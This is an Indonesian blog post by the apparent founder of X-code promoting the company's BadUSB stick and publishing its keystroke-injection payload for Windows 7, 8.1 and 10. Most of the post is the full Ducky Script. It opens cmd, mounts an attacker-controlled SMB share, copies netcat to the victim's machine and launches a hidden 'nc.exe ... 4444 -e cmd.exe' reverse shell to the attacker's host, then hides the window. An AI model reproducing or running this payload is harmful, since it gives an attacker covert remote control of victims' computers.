BadUSB Super X-code adalah Stick BadUSB yang dirancang untuk melakukan eksploitasi pada komputer melalui celah badusb.
X-code meluncurkan x-code badusb v1.0 pada tahun 2015 dan ditutup ditahun 2016 karena kehabisan stok.
Di bawah ini videonya.
Pada tahun 2018, X-code meluncurkan BadUSB Super X-code 2.0, lebih stabil dan jauh lebih baik dibandingkan versi 1.0
Di bawah ini bentuk USB Super X-code v2.0
Saat ini stok untuk semua badusb X-code sudah habis tapi bagi pengguna X-code USB Super X-code dapat menggunakan support cara menggunakannya di http://xcodetraining.com/badusb/
Jika anda memiliki Stick BadUSB tapi bukan dari X-code, saya kurniawan, founder x-code memberikan payload USB Super X-code 2.0 untuk publik, lisensi yang saya berikan pada payload ini adalah GNU General Public License.
Source code payload yang saya buat, support untuk remote Windows 7, 8.1 dan 10, dan telah diuji berjalan stabil.
REM Title: Netcat Reverse shell untuk Windows 7, Windows 8.1 & Windows 10 dengan pemanfaatan penggunaan share smb di komputer pentester REM Author : Kurniawan. [email protected]. xcode.or.id REM Version : 1.0 REM Description : Payload ini dirancang khusus oleh Kurniawan untuk BadUSB Super X-code 2.0 ( http://xcode.or.id/usbsuperxcode2 ), payload ini menggunakan gabungan perintah universal, seperti penggunaan CONTROL ESCAPE tapi juga untuk keluar dari cmd menggunakan ALT SPACE dan STRING C sehingga kompatibel dengan banyak windows (Windows 7, 8.1 dan 10), selain itu juga netcat berjalan secara tersembunyi dengan perintah nc.exe (ip publik / domain / subdomain) 4444 -e cmd.exe -d. Kelebihan penggunaan netcat dibandingkan menggunakan backdoor lain adalah netcat menerima domain / sub domain saat netcat melakukan koneksi ke komputer kita / pentester. DELAY 1000 CONTROL ESCAPE DELAY 1000 STRING RUN DELAY 1000 ENTER DELAY 1000 STRING cmd DELAY 1000 ENTER DELAY 500 STRING taskkill /f /pid nc.exeDELAY 200 ENTER DELAY 200 STRING del c:\Users\Public\Downloads\nc.exe DELAY 200 ENTER DELAY 3000 STRING net use z: /delete DELAY 200 ENTER DELAY 200 STRING net use z: \\(ip public / domain / sub domain)\(nama folder yang dishare) /u:(username) (password) DELAY 200 ENTER DELAY 200 STRING copy z:\nc.exe c:\Users\Public\Downloads DELAY 200 ENTER DELAY 3000 STRING y DELAY 200 ENTER DELAY 200 STRING net use z: /delete DELAY 200 ENTER DELAY 1000 STRING c:\Users\Public\Downloads\nc.exe (ip publik / domain / subdomain) 4444 -e cmd.exe -d DELAY 200 ENTER DELAY 3000 ALT SPACE STRING C DELAY 200
Selain dari blog ini, anda dapat mengakses source code payloadnya di https://github.com/kurniawandata/Payload-BadUSB-Super-X-code.
Kurniawan
Founder X-code
